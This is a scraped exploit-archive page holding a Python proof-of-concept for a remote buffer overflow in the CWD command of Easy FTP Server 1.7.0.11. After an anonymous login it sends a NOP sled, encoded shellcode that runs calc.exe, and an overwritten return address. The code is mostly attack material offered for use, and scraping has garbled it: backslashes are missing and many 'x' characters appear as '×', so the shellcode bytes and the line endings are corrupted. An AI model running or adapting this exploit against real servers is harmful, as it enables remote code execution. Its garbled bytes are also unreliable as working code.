Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================================
Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
================================================================================
# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
# Date: 2010-07-18
# Author: fdisk
# Software Link:
# Version: 1.7.0.11
# Tested on: Windows XP SP3 en
# CVE:
import socket
import sys
buffersize = 268
# windows/exec – 227 bytes x86/shikata_ga_nai EXITFUNC=process, CMD=calc.exe
shellcode = ("xb8xf1×18xc7×71xd9xc7×29xc9xb1×33xd9×74x24xf4"
"x5bx31×43x12×83xebxfcx03xb2×16x25×84xc8xcfx20"
"x67×30x10×53xe1xd5×21x41×95x9ex10×55xddxf2×98"
"x1exb3xe6×2bx52×1cx09×9bxd9×7ax24×1cxecx42xea"
"xdex6ex3fxf0×32x51×7ex3bx47×90x47×21xa8xc0×10"
"x2ex1bxf5×15x72xa0xf4xf9xf9×98x8ex7cx3dx6cx25"
"x7ex6dxddx32xc8×95x55×1cxe9xa4xbax7exd5xefxb7"
"xb5xadxeex11×84x4exc1×5dx4bx71xeex53×95xb5xc8"
"x8bxe0xcdx2bx31xf3×15x56xedx76×88xf0×66x20×68"
"x01xaaxb7xfbx0dx07xb3xa4×11x96×10xdfx2dx13×97"
"x30xa4×67xbcx94xedx3cxddx8dx4bx92xe2xcex33×4b"
"x47×84xd1×98xf1xc7xbfx5fx73×72x86×60x8bx7dxa8"
"x08xbaxf6×27x4ex43xddx0cxa0×09x7cx24×29xd4×14"
"x75×34xe7xc2xb9×41x64xe7×41xb6×74x82×44xf2×32"
"x7ex34×6bxd7×80xebx8cxf2xe2×6ax1fx9excax09xa7"
"x05×13")
eip = "x91xC8×41x7E" # CALL EDI – user32.dll
nopsled = "x90" * 16
payload = "x90" * (buffersize-(len(nopsled)+len(shellcode)))
def ExploitEasyFTP(target):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, 21))
s.recv(1024)
s.send(‘User anonymousrn’)
s.recv(1024)
s.send(‘PASS anonymousrn’)
s.send(‘CWD ‘+nopsled+shellcode+payload+eip+’rn’)
s.recv(1024)
s.send(‘QUIT ftprn’)
s.close()
target = sys.argv[1]
ExploitEasyFTP(target)
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-18]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13391
Leave a Reply